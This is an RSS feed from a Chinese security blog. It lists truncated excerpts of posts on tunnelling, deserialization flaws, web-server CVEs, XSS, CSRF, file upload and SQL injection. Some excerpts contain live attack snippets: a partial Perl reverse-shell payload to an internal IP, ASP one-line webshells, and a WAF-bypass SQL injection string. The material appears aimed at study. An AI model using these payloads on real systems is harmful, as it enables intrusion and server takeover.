<?xml version="1.0" encoding="utf-8" ?><rss version="2.0"><channel><title><![CDATA[LJH1999ZN的博客]]></title><description><![CDATA[]]></description><link>https://blog.csdn.net/LJH1999ZN</link><language>zh-cn</language><generator>https://blog.csdn.net/</generator><copyright><![CDATA[Copyright &copy; LJH1999ZN]]></copyright><item><title><![CDATA[隐藏通信隧道技术（下）]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/124024321</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/124024321</guid><author>LJH1999ZN</author><pubDate>Fri, 08 Apr 2022 00:24:14 +0800</pubDate><description><![CDATA[一、传输层隧道技术

1.Netcat获取shell（反向shell）

第一种：如果目标主机安装nc

在本地监听5555端口
	

	
	
	在目标主机上输入一下payload
	
		
Socket;$i="10.2.1.170";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(S.]]></description><category></category></item><item><title><![CDATA[隐藏通信隧道技术(上)]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/124000185</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/124000185</guid><author>LJH1999ZN</author><pubDate>Thu, 07 Apr 2022 01:15:50 +0800</pubDate><description><![CDATA[目录

一、防火墙的配置

二、kali虚拟机网卡配置

三、隐藏隧道技术的基础知识

1.什么是隧道技术：

2.检测内网连通性

3.利用icmp创建隧道

（1）使用的工具： icmpsh

（2）工具：Pingtunnel

4.传输层隧道技术

4.1使用nc工具创建隧道





一、防火墙的配置

1..首先进去防火墙，此时我们需要配置符合自己环境的ip

2.先配置lan ip

首先需要输入2，配置ip地址（仅主机）
	输入子网掩码位数
	是否需要dhcp服务
	注意：此时需要配置仅主..]]></description><category></category></item><item><title><![CDATA[Fastjson反序列化漏洞]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123870812</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123870812</guid><author>LJH1999ZN</author><pubDate>Thu, 31 Mar 2022 22:52:08 +0800</pubDate><description><![CDATA[一、fastjson简介

fastjson是java的一个库，可以将java对象转化为json格式的字符串，也可以将json格式的字符串转化为java对象

提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串，parseObject 方法则反过来将 JSON 字符串转换成对象。

二、fastjson反序列化漏洞原理

在反序列化的时候，会进入parseField方法，进]]></description><category></category></item><item><title><![CDATA[shiro反序列化漏洞的原理和复现]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123880171</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123880171</guid><author>LJH1999ZN</author><pubDate>Thu, 31 Mar 2022 22:51:42 +0800</pubDate><description><![CDATA[一、shiro简介

Shiro是一个强大的简单易用的Java安全框架，主要用来更便捷的认证，授权，加密，会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。

二、shiro的身份认证工作流程

通过前端传入的值，
	获取rememberMe cookie
	base64加密
	AES加密 （对称加解密）
	反序列化
三、shiro反序列化漏洞原理

AES加密的密钥Key被硬编码在代码里，意味着每个人通过源代码都能拿到AES加密的密钥。因此，攻击者构造一个恶意的对象，并且对其序列化，AES]]></description><category></category></item><item><title><![CDATA[Tomcat漏洞解析与复现]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123857324</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123857324</guid><author>LJH1999ZN</author><pubDate>Thu, 31 Mar 2022 02:26:26 +0800</pubDate><description><![CDATA[Tomcat是Apache开源组织开发的用于处理HTTP服务的项目，两者都是免费的，都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞，攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：webapp 配置文件或源代码等。

tomcat默认的conf/server.xml中配置了2个Connector，一个为8080的对外提供的HTTP协议端口，另外一个就是默认的8009 AJP协议端口，两个端口默认均监听在外网ip。

一、Aapach]]></description><category></category></item><item><title><![CDATA[其他常见的getshell方式]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123860459</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123860459</guid><author>LJH1999ZN</author><pubDate>Thu, 31 Mar 2022 02:22:31 +0800</pubDate><description><![CDATA[ASP常用的一句话木马：

&lt;%eval request(“hack")%&gt;
	&lt;%execute request(“hack")%&gt;
	&lt;%execute(request(“hack"))%&gt;
	&lt;%ExecuteGlobal request(“hack")%&gt;
一、修改配置文件getshell

HadSky5.5.2.20180525存在配置文件写入导致getshell 安装过程总共五个步骤来进行安装，每一步程序将会引用一些文件进行操作，但是由于inst]]></description><category></category></item><item><title><![CDATA[Apache漏洞原理与复现]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123830847</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123830847</guid><author>LJH1999ZN</author><pubDate>Wed, 30 Mar 2022 20:20:08 +0800</pubDate><description><![CDATA[一、Apache简介

Apache HTTP Server（简称Apache）是Apache软件基金会的一个开放源码的网页服务器，可以在大多数计算机操作系统中运行，由于其多平台和安全性被广泛使用，是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展，将Perl/Python等解释器编译到服务器中。

二、Apache的历史漏洞

Apache路径穿越漏洞（CVE-2021-41773）
	Apache 路径穿越漏洞（CVE-2021-42013）
	Apache SSRF漏洞（CVE-]]></description><category></category></item><item><title><![CDATA[Nginx文件解析漏洞的原理与复现]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123835818</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123835818</guid><author>LJH1999ZN</author><pubDate>Wed, 30 Mar 2022 01:04:34 +0800</pubDate><description><![CDATA[一、Nginx的简介

Nginx (engine x) 是一款轻量级的Web 服务器/反向代理服务器及电子邮件（IMAP/POP3）代理服务器，在BSD-like 协议下发行。其特点是占有内存少，并发能力强，事实上nginx的并发能力在同类型的网页服务器中表现较好，中国大陆使用nginx网站用户有：百度、京东、新浪、网易、腾讯、淘宝等

二、Nginx漏洞的原理

1，Nginx越界读取缓存漏洞（CVE-2017-7529） 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”]]></description><category></category></item><item><title><![CDATA[Jboss反序列化漏洞的复现与原理]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123831473</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123831473</guid><author>LJH1999ZN</author><pubDate>Tue, 29 Mar 2022 22:02:18 +0800</pubDate><description><![CDATA[一、什么是Jboss

Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可，可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器，支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司，而且jboss是开源的，免费的，且在J2EE应用服务器领域，JBoss是发展最为迅速的应用服务器，所以曾经广为流行。

二、Jboss的历史漏洞

1.jboss反序列化漏洞，CVE-2017-7504

漏洞存在/jbossmq-httpi]]></description><category></category></item><item><title><![CDATA[反序列化漏洞详解]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123338591</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123338591</guid><author>LJH1999ZN</author><pubDate>Mon, 07 Mar 2022 23:55:48 +0800</pubDate><description><![CDATA[目录

一、什么是序列化和反序列化

二、什么是反序列化漏洞

三、序列化函数（serialize）

四、反序列化(unserialize)

​五、什么是PHP魔术方法

六、一些常见的魔术方法

七、魔术方法的利用

八、反序列化漏洞的利用

1.__destruct()函数

2.__wakeup()

3.toString()

​九、反序列化漏洞的防御





一、什么是序列化和反序列化

序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.]]></description><category></category></item><item><title><![CDATA[任意代码执行漏洞]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123093360</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123093360</guid><author>LJH1999ZN</author><pubDate>Wed, 23 Feb 2022 19:19:35 +0800</pubDate><description><![CDATA[一、什么是任意代码执行漏洞

web应用程序是指程序员在代码中使用了一些执行函数例如eval，assert等函数，用户可以控制这个字符串去这些函数中执行，从而造成安全漏洞

二、漏洞的危害

执行任意的代码，例如协议脚本文件
	向网站写入webshell
	控制整个网站或者服务器
三、任意代码执行的漏洞

1.eval()函数
...]]></description><category></category></item><item><title><![CDATA[SSRF（服务器请求伪造）]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123093563</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123093563</guid><author>LJH1999ZN</author><pubDate>Wed, 23 Feb 2022 17:11:24 +0800</pubDate><description><![CDATA[一、什么是ssrf漏洞

SSRF(service side request forgery) 为服务器请求伪造，是一种右攻击者形成服务器端发起的安全漏洞。

二、造成ssrf的原因

有些web网站会提供从其他服务器上传数据的功能，会使用用户指定的url获取数据。由于对远程的url没有进行严格的过滤，所以攻击者可以通过该漏洞控制该web网站作为代理服务器攻击远程服务器或者该web的本地服务器。

三、ssrf漏洞的危害

可以对内网，本地进行端口扫描，查看端口的关闭状态；
	攻击运行在内网或者本地的应用程]]></description><category></category></item><item><title><![CDATA[利用文件包含漏洞-getshell]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123075761</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123075761</guid><author>LJH1999ZN</author><pubDate>Tue, 22 Feb 2022 21:22:08 +0800</pubDate><description><![CDATA[一、什么是文件包含漏洞

文件包含是指应用程序没有对引用的文件做合理的校验，导致包含的文件中含有恶意的代码，并且执行了该代码。从而产生了文件包含漏洞

二、文件包含漏洞的利用条件

1.引用一个任意类型的文件

2.程序读取文件并且执行

三、将木马程序放入某个本地文件中。

1.利用网站报错日志写入木马程序

2.利用文件上传功能，上传含有木马的任意文件

四、文件包含getshell

1.本地文件包含getshell

网站会将一些错误信息记录到日志文件中，我们可以利用这个特性将木马写入日志文件中去
]]></description><category></category></item><item><title><![CDATA[WEBshell与文件上传漏洞]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123012188</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123012188</guid><author>LJH1999ZN</author><pubDate>Sat, 19 Feb 2022 23:43:48 +0800</pubDate><description><![CDATA[一、文件上传漏洞的原理

如果web应用程序对上传文件的安全性没有过滤和校验，攻击者可以通过上传webshell恶意文件对服务器进行攻击 。

二、文件上传的原理

1.有文件上传功能

2.上传文件的目录能解析脚本文件

3.能访问到上传的文件

三、文件上传攻击

文件上传防护和绕过手段



1.文件上传漏洞--绕过前端js检测

由于网站客户端对文件的上传类型做了限制，不允许我们上传.php文件，我们可以通过bp抓取发送数据包，然后将数据包做改变即可






...]]></description><category></category></item><item><title><![CDATA[WEB安全-CSRF攻击原理]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/123009911</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/123009911</guid><author>LJH1999ZN</author><pubDate>Fri, 18 Feb 2022 22:23:58 +0800</pubDate><description><![CDATA[一、什么是CSRF漏洞的

跨站请求伪造（Cross-site request forgery），通常简称为CSRF或者XSRF。是一种通过借用用户的权限在网站上执行并非自己本意的操作。

二、CSRF漏洞具体可以干什么

以你的名义（发邮件；发消息；修改密码；转账；购买商品等）

三、CSRF成立的必要条件

1.受害者没有退出当前页面，也就是说cookie值没有过期。

2.受害者点击了攻击者所发送的恶意连接。

四、CSRF漏洞的原理

首先当用户登录并浏览一个可信网站时，攻击者发送一个恶意链接，用户]]></description><category></category></item><item><title><![CDATA[XSS注入绕过防护]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/122993896</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/122993896</guid><author>LJH1999ZN</author><pubDate>Thu, 17 Feb 2022 23:26:49 +0800</pubDate><description><![CDATA[一、输入与输出的防护机制

字符实体化
	关键字变形
	关键字去除
	尖括号去除
二、xss防护规则的绕过

1.大小写，双写绕过

为了避免XSS漏洞的存在，通常应用会对用户输入进行一定的安全处理后再输出的HTML中，

防护的方法有：

过滤：发现关键字返回错误
	编码：对关键字进行编码
	插入：插入改变关键字的符号
	删除：删除关键字
绕过防护的思路：

判断关键字
	判断防护规则
	尝试不同的payload
	大小写，双写
关键的符号有：' " ()&lt;&gt;{}=&amp;--;

关键..]]></description><category></category></item><item><title><![CDATA[手动挖掘XSS漏洞]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/122992933</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/122992933</guid><author>LJH1999ZN</author><pubDate>Thu, 17 Feb 2022 23:11:17 +0800</pubDate><description><![CDATA[一、xss注入的思路

在目标网站找到注入的点，例如注册，留言，搜索，提交，评论等页面
	在注入点输入一些字符，' " &lt; &gt; script alert javascript,点击提交查看是否被过滤。
	通过未过滤的语句判断是否可以进行js代码的编写
	提交构造的脚本，或者通过绕过的方式查看源码，判断是否存在xss漏洞
	一般查询接口、用户登录、搜索、订单提交容易出现反射型XSS，留言板、评论、用户昵称、用户信息等凡是可以提交数据由服务器进行存储和显示的位置都有可能出现存储型跨站容易出现存储型X]]></description><category></category></item><item><title><![CDATA[XSS注入的原理与实现]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/122972909</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/122972909</guid><author>LJH1999ZN</author><pubDate>Thu, 17 Feb 2022 09:22:01 +0800</pubDate><description><![CDATA[一、JavaScript的常用脚本

1.window.location.href 用来跳转页面

eg:&lt;script&gt;window.location.href='www.jd.com'&lt;/script&gt;

2.document.cookie

获取客户端的cookie值

3.script 可以通过“src”属性引入JavaScript文件

二、什么是同源策略

    同源策略在web应用的安全模型中是一个重要概念。在这个策略下，web浏览器允许第一个页面的脚本访问第...]]></description><category></category></item><item><title><![CDATA[SQL注入-getshell]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/122951715</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/122951715</guid><author>LJH1999ZN</author><pubDate>Tue, 15 Feb 2022 22:51:51 +0800</pubDate><description><![CDATA[一、getshell的含义

1.什么是shell？

Shell 是一个程序，提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符，让用户从键盘输入命令，所以又称为命令行环境。

2.什么是webshell?

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执]]></description><category></category></item><item><title><![CDATA[SQL注入-绕过安全狗]]></title><link>https://blog.csdn.net/LJH1999ZN/article/details/122920922</link><guid>https://blog.csdn.net/LJH1999ZN/article/details/122920922</guid><author>LJH1999ZN</author><pubDate>Tue, 15 Feb 2022 19:42:38 +0800</pubDate><description><![CDATA[绕过安全狗的常见四种方式





id=1'/*!44444order*/ /*!44444by*/3--+




]]></description><category></category></item></channel></rss>